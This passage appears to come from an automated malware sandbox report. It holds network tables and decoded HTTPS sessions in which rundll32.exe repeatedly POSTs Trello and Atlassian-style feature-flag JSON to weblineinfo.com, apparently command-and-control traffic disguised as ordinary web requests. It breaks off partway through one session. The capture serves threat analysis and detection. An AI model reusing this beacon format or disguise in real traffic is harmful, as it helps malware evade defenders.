    Aug 9, 2024 16:19:07.741533995 CEST | 443 | 49722 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:07.742857933 CEST | 49722 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:07.742865086 CEST | 443 | 49722 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:07.982789993 CEST | 443 | 49722 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:07.982887983 CEST | 443 | 49722 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:07.982985973 CEST | 49722 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:07.982985973 CEST | 49722 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:07.983222008 CEST | 49722 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:07.983242989 CEST | 443 | 49722 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:09.128716946 CEST | 49723 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:09.128766060 CEST | 443 | 49723 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:09.128865957 CEST | 49723 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:09.129190922 CEST | 49723 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:09.129206896 CEST | 443 | 49723 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:09.638194084 CEST | 443 | 49723 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:09.638345003 CEST | 49723 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:09.639024973 CEST | 49723 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:09.639039993 CEST | 443 | 49723 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:09.640430927 CEST | 49723 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:09.640455008 CEST | 443 | 49723 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:10.809541941 CEST | 443 | 49723 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:10.809617043 CEST | 443 | 49723 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:10.809679985 CEST | 49723 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:10.809751987 CEST | 49723 | 443 | 192.168.2.5 | 62.192.173.45
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Aug 9, 2024 16:17:10.349375963 CEST | 54510 | 53 | 192.168.2.5 | 1.1.1.1
    Aug 9, 2024 16:17:10.367651939 CEST | 53 | 54510 | 1.1.1.1 | 192.168.2.5
    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
    Aug 9, 2024 16:17:10.349375963 CEST | 192.168.2.5 | 1.1.1.1 | 0x4486 | Standard query (0) | weblineinfo.com | A (IP address) | IN (0x0001) | false
    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
    Aug 9, 2024 16:17:10.367651939 CEST | 1.1.1.1 | 192.168.2.5 | 0x4486 | No error (0) | weblineinfo.com | | 62.192.173.45 | A (IP address) | IN (0x0001) | false
    • weblineinfo.com
    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    0 | 192.168.2.5 | 49704 | 62.192.173.45 | 443 | 3480 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:17:11 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 735
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:11 UTC | 735 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 61 32 38 63 32 33 39 32 66 61 35 65 35 65 39 66 35 61 30 31 38 36 36 65 31 64 65 36 32 38 66 34 36 37 62 35 39 38 33 31 63 32 30 62 36 61 30 37 31 32 65 39 37 31 64 63 32 37 63 31 64 31 62 61 62 62 66 64 66 34
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258fa28c2392fa5e5e9f5a01866e1de628f467b59831c20b6a0712e971dc27c1d1babbfdf4
    2024-08-09 14:17:11 UTC | 303 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 519
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:11 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:11 UTC | 519 | IN | Data Raw: 7b 22 65 78 70 65 72 69 6d 65 6e 74 56 61 6c 75 65 73 22 3a 7b 22 66 65 61 74 75 72 65 5f 67 61 74 65 73 22 3a 7b 22 33 38 36 38 37 38 33 33 38 34 22 3a 7b 22 6e 61 6d 65 22 3a 22 37 34 39 32 37 37 35 32 33 33 39 32 22 2c 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 72 75 6c 65 5f 69 64 22 3a 22 70 6d 4a 7a 68 7a 77 70 4b 4c 37 48 64 4c 52 6f 63 61 71 4d 77 55 3a 31 30 30 2e 30 30 3a 33 22 2c 22 73 65 63 6f 6e 64 61 72 79 5f 65 78 70 6f 73 75 72 65 73 22 3a 5b 5d 7d 7d 2c 22 64 79 6e 61 6d 69 63 5f 63 6f 6e 66 69 67 73 22 3a 7b 22 34 32 30 30 33 32 38 38 31 30 22 3a 7b 22 6e 61 6d 65 22 3a 22 34 32 30 30 33 32 38 38 31 30 22 2c 22 76 61 6c 75 65 22 3a 7b 7d 2c 22 72 75 6c 65 5f 69 64 22 3a 22 70 72 65 73 74 61 72 74 22 2c 22 73 65 63 6f 6e 64 61 72 79 5f 65
    Data Ascii: {"experimentValues":{"feature_gates":{"3868783384":{"name":"749277523392","value":true,"rule_id":"pmJzhzwpKL7HdLRocaqMwU:100.00:3","secondary_exposures":[]}},"dynamic_configs":{"4200328810":{"name":"4200328810","value":{},"rule_id":"prestart","secondary_e


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    1 | 192.168.2.5 | 49705 | 62.192.173.45 | 443 | 3480 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:17:12 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:12 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:17:12 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:12 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:12 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    2 | 192.168.2.5 | 49706 | 62.192.173.45 | 443 | 6112 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:17:17 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 735
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:17 UTC | 735 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 61 32 38 63 32 33 39 32 66 61 35 65 35 65 39 66 35 61 30 31 38 36 36 65 31 64 65 36 32 38 66 34 36 37 62 35 39 38 33 31 63 32 30 62 36 61 30 37 31 32 65 39 37 31 64 63 32 37 63 31 64 31 62 61 62 62 66 64 66 34
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258fa28c2392fa5e5e9f5a01866e1de628f467b59831c20b6a0712e971dc27c1d1babbfdf4
    2024-08-09 14:17:17 UTC | 303 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 519
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:17 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:17 UTC | 519 | IN | Data Raw: 7b 22 65 78 70 65 72 69 6d 65 6e 74 56 61 6c 75 65 73 22 3a 7b 22 66 65 61 74 75 72 65 5f 67 61 74 65 73 22 3a 7b 22 33 38 36 38 37 38 33 33 38 34 22 3a 7b 22 6e 61 6d 65 22 3a 22 37 34 39 32 37 37 35 32 33 33 39 32 22 2c 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 72 75 6c 65 5f 69 64 22 3a 22 70 6d 4a 7a 68 7a 77 70 4b 4c 37 48 64 4c 52 6f 63 61 71 4d 77 55 3a 31 30 30 2e 30 30 3a 33 22 2c 22 73 65 63 6f 6e 64 61 72 79 5f 65 78 70 6f 73 75 72 65 73 22 3a 5b 5d 7d 7d 2c 22 64 79 6e 61 6d 69 63 5f 63 6f 6e 66 69 67 73 22 3a 7b 22 34 32 30 30 33 32 38 38 31 30 22 3a 7b 22 6e 61 6d 65 22 3a 22 34 32 30 30 33 32 38 38 31 30 22 2c 22 76 61 6c 75 65 22 3a 7b 7d 2c 22 72 75 6c 65 5f 69 64 22 3a 22 70 72 65 73 74 61 72 74 22 2c 22 73 65 63 6f 6e 64 61 72 79 5f 65
    Data Ascii: {"experimentValues":{"feature_gates":{"3868783384":{"name":"749277523392","value":true,"rule_id":"pmJzhzwpKL7HdLRocaqMwU:100.00:3","secondary_exposures":[]}},"dynamic_configs":{"4200328810":{"name":"4200328810","value":{},"rule_id":"prestart","secondary_e


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    3 | 192.168.2.5 | 49707 | 62.192.173.45 | 443 | 6112 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:17:18 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:18 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:17:18 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:18 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:18 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    4 | 192.168.2.5 | 49715 | 62.192.173.45 | 443 | 3480 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:17:40 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:40 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:17:40 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:40 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:40 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    5 | 192.168.2.5 | 49716 | 62.192.173.45 | 443 | 6112 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:17:54 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:54 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:17:54 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:54 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:54 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    6 | 192.168.2.5 | 49718 | 62.192.173.45 | 443 | 3480 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:18:15 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:18:15 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:18:15 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:18:15 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:18:15 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    7 | 192.168.2.5 | 49719 | 62.192.173.45 | 443 | 6112 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:18:22 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:18:22 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:18:22 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:18:22 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:18:22 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    8 | 192.168.2.5 | 49720 | 62.192.173.45 | 443 | 3480 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:18:45 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
